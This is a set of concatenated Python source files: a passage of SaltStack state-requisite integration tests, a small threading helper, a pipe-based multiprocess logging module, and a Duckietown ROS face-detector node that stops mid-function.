def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls',
mods='requisites.onfail_multiple',
timeout=self.TIMEOUT)
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.listen_names',
timeout=self.TIMEOUT)
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
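        # A retry-enabled state looks roughly like the sketch below (hypothetical;
        # the real fixture lives in retry/retry_custom.sls and its values may differ):
        #   file_test:
        #     file.exists:
        #       - name: /path/to/a/non-existent/file.txt
        #       - retry:
        #           attempts: 5
        #           interval: 10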
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
        test a state with the retry option that should return True immediately (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
@flaky
def test_retry_option_eventual_success(self):
'''
        test a state with the retry option that should return True after at least 4 retry attempts
        but never reach 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
@skipIf(salt.utils.platform.is_darwin() and six.PY2, 'This test hangs on OS X on Py2')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
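        # Illustrative only (the real cache naming happens inside the state
        # compiler): hashlib.sha1(tag.encode()).hexdigest() always produces a
        # fixed 40-character name, however long the chunk's tag is.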
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
def _add_runtime_pillar(self, pillar):
'''
        helper function to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed\nNote: No changes made, actual changes may\nbe different due to other states.'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed\nNote: No changes made, actual changes may\nbe different due to other states.'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'Empty file',
'pchanges': {},
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}{1}test.txt created'.format(TMP, os.path.sep)}},
'file_|-unless_true_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True}}
for id in _expected:
self.assertEqual(sls[id]['comment'], _expected[id]['comment'])
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
# remove testfile added in issue-30161.sls state file
state_file = os.path.join(TMP, 'test.txt')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
__init__.py
|
import threading
import time
def run(runner):
runner.process()
def start_runner(runner):
t = threading.Thread(target=run, args=(runner, ))
t.start()
time.sleep(0.01) # make sure runner started.
return t
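# Hypothetical usage sketch (names below are invented for illustration): any
# object exposing a process() method can be handed to start_runner().
if __name__ == "__main__":
    class DemoRunner(object):
        def process(self):
            print("demo runner is processing")

    runner_thread = start_runner(DemoRunner())
    runner_thread.join()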
|
logger.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import logging
import multiprocessing
import os
import pickle
import signal
import sys
from enum import Enum
from logging.handlers import RotatingFileHandler, QueueHandler
from typing import Optional
class LogLevel(Enum):
CRITICAL = logging.CRITICAL
FATAL = CRITICAL
ERROR = logging.ERROR
WARNING = logging.WARNING
WARN = WARNING
INFO = logging.INFO
DEBUG = logging.DEBUG
NOTSET = logging.NOTSET
class LogEventQueue(object):
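    """
    A tiny queue-like object backed by an os.pipe2() pipe and used in place of a
    multiprocessing queue for log events: put() writes a 2-byte big-endian length
    prefix followed by a pickled LogRecord of at most 4094 bytes, so each record
    (prefix + payload <= 4096 bytes) fits inside the PIPE_BUF atomic-write
    guarantee that put() relies on. A zero length acts as the end-of-stream marker.
    """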
def __init__(self):
self._rpipe, self._wpipe = os.pipe2(0)
self._closed = False
@staticmethod
def _int_to_2bytes(x: int) -> bytes:
if x > 4096:
print("LogEventQueue: _int_to_2bytes(x): x > 4096", sys.stderr)
exit(2)
elif x < 256:
return bytes([0, x])
else:
return x.to_bytes((x.bit_length() + 7) // 8, 'big')
@staticmethod
def _int_from_2bytes(xbytes: bytes) -> int:
x = int.from_bytes(xbytes, 'big')
if x > 4096:
print("LogEventQueue: _int_from_2bytes(xbytes): x > 4096", sys.stderr)
exit(2)
return x
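    # Length-prefix round trip example: _int_to_2bytes(300) == b'\x01\x2c' and
    # _int_from_2bytes(b'\x01\x2c') == 300; values below 256 are padded with a
    # leading zero byte so the prefix is always exactly two bytes wide.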
def put_nowait(self, record):
        # QueueHandler calls put_nowait(); deliberately turn it into a blocking put().
self.put(record)
def _read(self, n: int) -> Optional[bytes]:
nread = 0
curr = bytes([])
while nread < n:
nxt = os.read(self._rpipe, n - nread)
if len(nxt) == 0: # EOF on pipe means no more log events
return None
curr = curr + nxt
nread += len(nxt)
return curr
def get(self):
"""
Warning: this will not behave as expected if there is ever more than one
consumer of the queue. Only intended for usage by the listener process.
"""
if self._closed:
return None
s = self._read(2)
if s is None:
return None
s = self._int_from_2bytes(s)
if s == 0:
self._closed = True
return None
if s > 4094: # should never happen with corresponding put
print("LogEventQueue: msg_bytes > 4094", sys.stderr)
exit(2)
p = self._read(s)
if p is None: # EOF shouldn't happen between size and pickle
return None
return pickle.loads(p)
def put(self, r: logging.LogRecord):
if self._closed:
return
if r is None:
os.write(self._wpipe, self._int_to_2bytes(0))
self._closed = True
return
# Need to form a pickle that is <= 4094 bytes (explanation below).
if len(r.msg) > 3500:
r.msg = r.msg[:3500] + "...LOG TRUNCATED..."
r.message = r.msg
p = pickle.dumps(r)
while len(p) > 4094:
if len(r.msg) < 200:
print("LogEventQueue: r.msg < 200 but len(p) > 4094", sys.stderr)
exit(2)
r.msg = r.msg[:-100] + "...LOG TRUNCATED..."
r.message = r.msg
p = pickle.dumps(r)
# POSIX.1-2001 requires for write() bytes less than PIPE_BUF (4096 on Linux)
# with O_NONBLOCK disabled (must be enabled with fcntl() explicitly which
# we don't) -- a condition which we satisfy here -- all bytes are written
# atomically. The write() may block if there is not room for all the
        # bytes to be written immediately. We are okay with a blocking write() since
        # this only throttles log producers when the consumer (the log listener
        # process) is 100% occupied relaying the logs it get()s, which is already a
        # lot of logs.
os.write(self._wpipe, self._int_to_2bytes(len(p)) + p) # <= 4096
def log(self, level: LogLevel, msg):
"""
A basic facility to write into the logs queue directly to be used in subprocesses
where state sharing or deadlock may be of concern and to rule out potential
of logger module internals to be cause of deadlock.
"""
        self.put(logging.LogRecord("batch", int(level.value), "", 0, msg, (), None))
# Convenience functions for the common LogLevels.
def debug(self, msg):
self.log(LogLevel.DEBUG, msg)
def info(self, msg):
self.log(LogLevel.INFO, msg)
def warning(self, msg):
self.log(LogLevel.WARNING, msg)
def error(self, msg):
self.log(LogLevel.ERROR, msg)
def critical(self, msg):
self.log(LogLevel.CRITICAL, msg)
def fatal(self, msg):
self.log(LogLevel.FATAL, msg)
def setup_logging(log_folder, console_log_level, file_log_level):
"""
Setup a logging configuration that can be safely inherited by a children process tree.
    All logging events will be set up to actually go to a shared LogEventQueue, and we
create a single listener process that takes care of pulling events from this queue
and pushing them to the actual desired destinations. The queue and listener process
returned by this function should be finalized on main (top-level) process termination
by invoking:
```
log_queue.put(None)
log_listener.join()
```
:param console_log_level: log level for console
:param file_log_level: log level for file
:param log_folder: if set, the place to log files as well (otherwise no log files)
:return: pair of the log_queue, log_listener which are provided for proper disposal.
"""
log_queue = LogEventQueue()
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
log_listener = multiprocessing.Process(
target=__listener_process_loop, args=(log_queue, log_folder, console_log_level, file_log_level))
log_listener.name = "LoggingListenerProcess"
log_listener.start()
signal.signal(signal.SIGINT, original_sigint_handler)
# All processes that are not the special LoggingListenerProcess will just see
# the QueueHandler as their logger.
h = QueueHandler(log_queue)
root = logging.getLogger()
root.addHandler(h)
root.setLevel(logging.DEBUG)
return log_queue, log_listener
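# Minimal usage sketch (illustrative values, mirroring the docstring above):
#
#   log_queue, log_listener = setup_logging("/tmp/logs", logging.INFO, logging.DEBUG)
#   logging.getLogger("batch").info("hello from any process in the tree")
#   ...
#   log_queue.put(None)    # tell the listener to drain and stop
#   log_listener.join()    # wait for the listener process to exit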
# Now define a process routine that is executed only by a dedicated process,
# which we call the "LoggingListenerProcess", that reads log events from a queue
# and then logs them to the desired destinations/sinks. Because the queue is
# shared across processes, this unifies logging: the multiple cooperating
# processes only need to push log events onto the queue.
def __listener_process_loop(queue: LogEventQueue, log_folder, console_log_level, file_log_level):
__listener_process_configure_logging(log_folder, console_log_level, file_log_level)
while True:
record = queue.get()
if record is None:
return
inner_logger = logging.getLogger(record.name)
inner_logger.handle(record)
def __listener_process_configure_logging(log_folder, console_log_level, file_log_level):
logger = logging.getLogger("batch")
logger.setLevel(logging.DEBUG)
# Create console handler with a higher log level
console_log = logging.StreamHandler()
console_log.setLevel(console_log_level)
# Create formatter and add it to the handler
formatter = logging.Formatter(
u'%(asctime)s.%(msecs)03d:%(levelname)s:%(processName)s:%(message)s', '%Y-%m-%d %H:%M:%S')
console_log.setFormatter(formatter)
# Add the handler to the logger
logger.addHandler(console_log)
# Add file based logging as well, if enabled
if log_folder is not None:
if not os.path.isdir(log_folder):
try:
os.makedirs(log_folder, exist_ok=True)
logger.info("Log folder {0} created successfully".format(log_folder))
except OSError as error:
logger.error("Log folder {0} can not be created: {1}".format(log_folder, error))
exit(1)
# Create file handler which logs even debug messages
file_log = RotatingFileHandler(
os.path.join(log_folder, "run.log"),
mode="a",
maxBytes=50*1024*1024,
backupCount=20,
delay=False,
encoding="utf-8",
)
file_log.setLevel(file_log_level)
file_log.setFormatter(formatter)
logger.addHandler(file_log)
|
face_detector_qwer_node.py
|
#!/usr/bin/env python
import rospy
import numpy as np
import math
from duckietown_msgs.msg import Twist2DStamped
from sensor_msgs.msg import CompressedImage, Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import sys
import time
import threading
class face_detector_wama(object):
def __init__(self):
self.node_name = rospy.get_name()
self.thread_lock = threading.Lock()
self.active = True
# to do: initialize the face_detected scenario to no-faces-detected
self.face_detected = False
self.bridge = CvBridge()
# Publication
# To do : publish ros message topic: /node_name/car_cmd, datatype: Twist2DStamped
self.pub_car_cmd = rospy.Publisher("~car_cmd",Twist2DStamped,queue_size=1)
# To do : publish ros message topic: /node_name/image_with_face, datatype: Image
self.pub_image_face = rospy.Publisher("~image_with_face", Image, queue_size=1)
# Subscription
# To do : subscribe ros message topic: /node_name/joystick_car_cmd datatype: Twist2DStamped, callback function: self.cbJoystick
self.sub_joystick_car_cmd = rospy.Subscriber("~joystick_car_cmd", Twist2DStamped, self.cbJoystick,queue_size=1)
# To do : subscribe ros message topic: /node_name/image, datatype: CompressedImage, callback function: self.cbImage
self.sub_image_origin = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
# safe shutdown
rospy.on_shutdown(self.custom_shutdown)
# timer
rospy.loginfo("[%s] Initialized " %(rospy.get_name()))
def custom_shutdown(self):
rospy.loginfo("[%s] Shutting down..." %self.node_name)
# Send stop command
car_control_msg = Twist2DStamped()
car_control_msg.v = 0.0
car_control_msg.omega = 0.0
self.publishCmd(car_control_msg)
rospy.sleep(0.5) #To make sure that it gets published.
rospy.loginfo("[%s] Shutdown" %self.node_name)
def cbImage(self, image_msg):
if not self.active:
return
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
return
try:
self.cbFacedetect(image_msg)
finally:
self.thread_lock.release()
def publishCmd(self,car_cmd_msg):
# to do: use the pub_car_cmd publisher we initialized at line 24 to publish the car command message
self.pub_car_cmd.publish(car_cmd_msg)
def cbJoystick(self,car_cmd_msg):
# to do: if the face_detected scenario is no-face-detected, keep the joystick command as the car control command
if self.face_detected == 0:
# to do: initialize a car command message to publish, datatype: Twist2DStamped
car_control_msg = Twist2DStamped()
# to do: use the joystick command as the car command
car_control_msg.v = car_cmd_msg.v
car_control_msg.omega = car_cmd_msg.omega
# to do: publish car control command
self.publishCmd(car_control_msg)
def cbFacedetect(self, image_msg):
# Decompress image and convert ROS image message to cv image
narr = np.fromstring(image_msg.data, np.uint8)
